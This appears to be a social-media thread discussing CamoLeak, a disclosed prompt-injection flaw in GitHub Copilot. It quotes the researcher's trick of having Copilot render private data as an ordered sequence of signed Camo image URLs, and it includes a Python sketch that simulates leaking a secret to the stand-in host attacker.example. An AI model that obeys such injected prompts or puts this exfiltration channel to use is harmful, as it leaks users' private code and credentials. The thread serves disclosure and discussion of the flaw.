fucking lol. remember the rick astley attack on github copilot? same guy's found another one https://www.legitsecurity.com/blog/camoleak-critical-github-copilot-vulnerability-leaks-private-source-code (fixed 14 aug)
EDIT: gitlab, not github sorry!
@melunaka https://pivot-to-ai.com/2025/05/24/ai-coding-bot-allows-prompt-injection-with-a-pull-request/
gitlab not github, sorry!
"I spent a long time thinking about this problem before this crazy idea struck me.
If I create a dictionary of all letters and symbols in the alphabet, pre-generate their corresponding Camo URLs, embed this dictionary into the injected prompt, and then ask Copilot to play a “small game” by rendering the content I want to leak as “ASCII art” composed entirely of images, will Copilot inject valid Camo images that the browser will render by their order? Yes, it will."
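The trick described above can be sketched in a few lines. This is a hypothetical simulation, not the researcher's actual exploit: the signing key, attacker domain, and helper names are all made up, and real Camo URLs are signed server-side by GitHub, but the shape (HMAC-signed proxy URL per character, secret recovered from the order of image fetches) matches what the quote describes.

```python
import hmac
import hashlib
import string

CAMO_BASE = "https://camo.githubusercontent.com"
SECRET_KEY = b"not-the-real-key"  # hypothetical; the real key lives on GitHub's Camo server

def camo_url(origin_url: str) -> str:
    """Camo-style signed proxy URL: HMAC-SHA1 of the origin URL,
    followed by the hex-encoded origin (Camo's documented URL scheme)."""
    digest = hmac.new(SECRET_KEY, origin_url.encode(), hashlib.sha1).hexdigest()
    return f"{CAMO_BASE}/{digest}/{origin_url.encode().hex()}"

# Attacker pre-generates one signed image URL per character,
# each pointing at a pixel on a server they control (hypothetical domain).
ALPHABET = string.ascii_letters + string.digits + "=_-./ "
char_to_camo = {c: camo_url(f"https://attacker.example/px/{ord(c)}.png") for c in ALPHABET}
camo_to_char = {v: k for k, v in char_to_camo.items()}

def leak_as_images(secret: str) -> list[str]:
    """What the injected prompt asks Copilot to do: render the secret
    as an ordered row of 'ASCII art' images from the dictionary."""
    return [char_to_camo[c] for c in secret if c in char_to_camo]

def recover(request_log: list[str]) -> str:
    """Attacker's server-side view: the browser fetches the images in
    order, so the request log spells out the secret."""
    return "".join(camo_to_char[u] for u in request_log)

log = leak_as_images("API_KEY=hunter2")
print(recover(log))  # → API_KEY=hunter2
```

Each URL is individually a valid, signed Camo image, which is why the proxy happily serves them; the secret only exists in the *sequence* of requests.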
Haha
@davidgerard fun fact! they have been aware of this vuln since may, the report above is a duplicate. original finder of the vuln here lol
(yes, they seriously consider an LLM leaking your private repo contents a "low risk issue")
An information disclosure vulnerability was identified in GitHub Enterprise Server via attacker uploaded asset URL allowing the attacker to retrieve metadata information of a user who clicks on the URL and further exploit it to create a convincing phishing page. This required the attacker to upload malicious SVG files and phish a victim user to click on that uploaded asset URL. This...